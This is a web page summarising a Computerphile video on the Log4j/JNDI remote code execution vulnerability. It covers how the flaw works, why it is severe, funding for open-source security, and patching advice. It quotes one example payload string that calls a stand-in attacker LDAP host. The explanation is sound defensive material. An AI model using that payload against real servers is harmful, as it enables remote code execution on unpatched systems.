How does the Log4j exploit work with JNDI?

Log4j's ability to substitute variables in log messages, combined with JNDI's capability to look up and load data from external sources (like LDAP servers), allows an attacker to trick the vulnerable server into executing arbitrary Java code delivered via JNDI.

What makes the Log4j exploit so bad?

The exploit is particularly devastating because Log4j is used in a vast number of Java applications, making the potential attack surface enormous. It's also relatively easy to execute, doesn't require high levels of expertise, and can lead to full remote code execution.

Is Log4j automatically included with Java?

Log4j is not automatically included with a standard Java installation, but it is very easy to add as a dependency using build tools like Maven or Gradle. Its widespread adoption means it's often included by default or with minimal configuration in many Java projects and frameworks.

What is the main advice for software developers regarding libraries like Log4j?

Developers should prioritize using libraries that do one thing well and are designed with security in mind. It's crucial to understand all features of integrated libraries and to avoid bundling too much functionality, as this increases the attack surface and potential for bugs.

Who is responsible for the security of free, open-source software like Log4j?

While open-source software is freely available, its security is a collective responsibility. Companies that profit from using these libraries often underfund their development and maintenance, leading to vulnerabilities like the one found in Log4j. There's a growing discussion about better funding models for critical open-source components.

How difficult is it to patch systems for the Log4j vulnerability?

Patching systems for the Log4j vulnerability is a significant undertaking. It requires identifying all instances of the vulnerable library, updating them, and redeploying applications, which can be a complex and time-consuming process, especially for large-scale deployments.

Key Moments

Log4J & JNDI Exploit: Why So Bad? - Computerphile

Computerphile

Education4 min read27 min video

Dec 22, 2021|513,661 views|16,209|1,155

computers computerphile computer science Computer Science University of Nottingham Dr Mike Pound Dr Steve Bagley Log4J JNDI Exploit Vulnerability

Save to Pod

Key Moments

TL;DR

Log4j vulnerability is critical due to JNDI exploit allowing remote code execution.

Key Insights

Log4j is a widely used Java logging library, making the vulnerability pervasive.

The exploit leverages JNDI to allow remote code execution by tricking servers into running malicious Java objects.

Untrusted user input can be logged in a way that triggers recursive variable expansion, leading to the JNDI exploit.

This vulnerability is critical because it's easy to exploit, affects many systems, and allows attackers to run arbitrary code.

Open-source libraries, while beneficial, can harbor hidden vulnerabilities if not carefully designed and maintained.

The widespread dependency on free, open-source software raises questions about funding for comprehensive security.

THE PERVASIVENESS OF LOG4J

Log4j is an extremely popular Java logging library, often described as essential for Java development, akin to oxygen or water. Its widespread adoption across major companies like Microsoft, Apple, and Amazon means that a vulnerability within it affects a vast number of systems. This ubiquity makes any security flaw in Log4j a significant concern for the entire software ecosystem.

THE ROLE OF JNDI IN THE EXPLOIT

A core component of the Log4j vulnerability lies not solely within Log4j itself, but in Java's JNDI (Java Naming and Directory Interface). Log4j's features allow it to log not just data but also system information. Critically, it can interpret special strings (like $ {variable}) and recursively expand them. When a malicious string is logged, Log4j passes it to JNDI, which can then be used to connect to external services and even download and execute remote Java code.

HOW THE EXPLOIT WORKS

The exploit occurs when untrusted data, such as a user's input in a web request (like a User-Agent string), is logged by Log4j. If this data contains a carefully crafted string such as `${jndi:ldap://attacker.com/a}`, Log4j will attempt to resolve it. JNDI, seeing the LDAP protocol, will connect to the attacker's server and can be instructed remotely to return a Java object containing malicious code that the vulnerable server then executes.

THE SEVERITY AND EASE OF EXPLOITATION

The Log4j and JNDI exploit is considered critical due to its ease of exploitation and extensive reach. Crafting the malicious string requires minimal expertise, with examples readily available online. Unlike complex exploits, this is straightforward to implement. The recursive nature of Log4j's variable expansion means that even data indirectly processed can trigger the vulnerability, making many systems, including internal ones not directly exposed to the internet, potential targets.

IMPLICATIONS FOR SOFTWARE DEVELOPMENT AND OPEN SOURCE

This incident highlights potential pitfalls in relying heavily on feature-rich open-source libraries. While open source allows for transparency and community fixes, it also means developers might unknowingly incorporate complex functionalities and associated vulnerabilities. The ease with which Log4j could be added to projects, as demonstrated with Maven, underscores how developers may prioritize convenience over a full understanding of a library's security implications.

THE CHALLENGE OF MAINTAINING OPEN-SOURCE SECURITY

A significant issue raised is the funding and maintenance of critical open-source projects like Log4j. Many essential libraries are developed by a small number of individuals, often without direct compensation. This contrasts with commercial software and raises questions about the sustainability of securing the foundational components of the digital world. The Heartbleed bug in OpenSSL serves as a precedent, illustrating how widely used, free software can harbor critical flaws.

DESIGN PRINCIPLES FOR SECURE LIBRARIES

The ideal approach to library design, as suggested by the exploit, is to adhere to the principle of doing one thing well. Libraries should focus on a single, critical function, with additional features or complexities being implemented as separate, composable components. This modularity allows developers to selectively enable features they understand and need, rather than inheriting a broad attack surface by default.

THE ROLE OF OPEN SOURCE AND COMMUNITY FIXES

While the vulnerability is severe, the open-source nature of Log4j is also its saving grace. Developers can examine the source code, identify the problem, and develop patches. This contrasts with proprietary software where users are dependent on the vendor. However, it also places the burden of detecting, patching, and redeploying fixes on countless organizations, a process that is time-consuming and resource-intensive, especially for large-scale deployments.

THE FUTURE LANDSCAPE OF SOFTWARE VULNERABILITIES

The Log4j and JNDI exploit is likely not an isolated incident. It signals a potential new wave of attacks targeting less scrutinized features within widely adopted libraries. Organizations and developers must now be more vigilant, scrutinizing all dependencies, both open-source and closed-source, for similar hidden vulnerabilities. The concept of 'Pandora's Box' being opened suggests a period of heightened security awareness and discovery.

Mentioned in This Episode

●Software & Apps

●Companies

●Organizations

●Concepts

Log4j Exploit: Do's and Don'ts

Practical takeaways from this episode

Do This

Update Log4j to the latest secure version immediately.

Review your application's logging to ensure no untrusted user input is passed.

Understand the full features and potential risks of libraries you integrate.

Consider keeping libraries simple and focused on a single task.

Explore options for properly funding critical open-source infrastructure.

Avoid This

Do not rely on logging untrusted data without sanitization.

Do not ignore potential vulnerabilities in widely adopted open-source libraries.

Do not use libraries with features you don't fully understand, especially if they are enabled by default.

Do not assume a library is secure solely because it is open source.

Do not postpone patching critical vulnerabilities.

Common Questions

The Log4j vulnerability allows attackers to remotely execute code on a server by sending specially crafted strings that are logged by the Log4j2 utility. This happens because Log4j can interpret certain inputs and, in conjunction with Java's JNDI, can trigger malicious code downloads and execution.

Topics

Log4j JNDI Exploit Remote Code Execution Apache Foundation Spring Boot

Mentioned in this video

Software & Apps

LDAP

Lightweight Directory Access Protocol, one of the services that can be queried using JNDI, exploited in the Log4j vulnerability.

JNDI

Java Naming and Directory Interface, a Java API used for looking up data in various services, which is a key vulnerability vector in the Log4j exploit.

Log4j2

A Java-based logging utility from the Apache Foundation, widely used and found to have a critical vulnerability allowing for remote code execution.

Spring Boot

A framework used to create web servers and REST APIs, demonstrated by Mike to show how Log4j can be integrated.

SLF4J

A logging facade for Java, Mike uses this interface to demonstrate logging with Log4j.

RMI

Remote Method Invocation, a Java technology that can be queried using JNDI.

Maven

A build automation tool used in Java development, shown to be used for adding Log4j as a dependency to a project.

Concepts

DNS